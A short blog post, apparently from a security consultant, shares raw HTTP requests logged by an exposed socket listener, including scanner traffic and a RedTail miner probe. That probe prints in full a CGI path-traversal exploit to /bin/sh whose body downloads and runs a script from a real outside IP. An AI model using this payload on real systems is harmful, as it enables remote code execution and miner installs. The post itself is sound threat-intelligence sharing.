Over the course of consulting engagements over the past few weeks, I’ve used socket listeners quite often due to their usefulness. In doing so, I would meet my goals but also opened up my testing vm box to possible threats and some unique new user agent most have never seen before.
The first one below is from the newly infamous redtail miner.
And here’s some strategic intel on that. I only had this listener open for 1 working day before i got that request from that.
Just 1! Check them out below. You’d be amazed at what you can learn when openeing up a socket listener, just be careful. Below:
[+] CONNECTION FROM: 95.70.169.208
RAW DATA RECEIVED (368 bytes):
b’POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\r\nAccept: /\r\nUpgrade-Insecure-Requests: 1\r\nHost: 18.119.96.49:80\r\nUser-Agent: libredtail-http\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: 119\r\n\r\n(wget –no-check-certificate -qO- https://178.16.55.224/sh || curl -sk https://178.16.55.224/sh) | sh -s apache.selfrep’
REQUEST LINE: POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
And others notables are also below.
[+] CONNECTION FROM: 167.94.138.115
RAW DATA RECEIVED (158 bytes):
b’GET / HTTP/1.1\r\nHost: 18.119.96.49\r\nUser-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)\r\nAccept: /\r\nAccept-Encoding: gzip\r\n\r\n’
REQUEST LINE: GET / HTTP/1.1
[+] CONNECTION FROM: 185.247.137.192
RAW DATA RECEIVED (192 bytes):
b’GET / HTTP/1.1\r\nHost: 18.119.96.49\r\nUser-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)\r\nConnection: close\r\nAccept: /\r\nAccept-Encoding: gzip\r\n\r\n’
REQUEST LINE: GET / HTTP/1.1
[+] CONNECTION FROM: 185.247.137.190
RAW DATA RECEIVED (298 bytes):
b””
REQUEST LINE:
Leave a Reply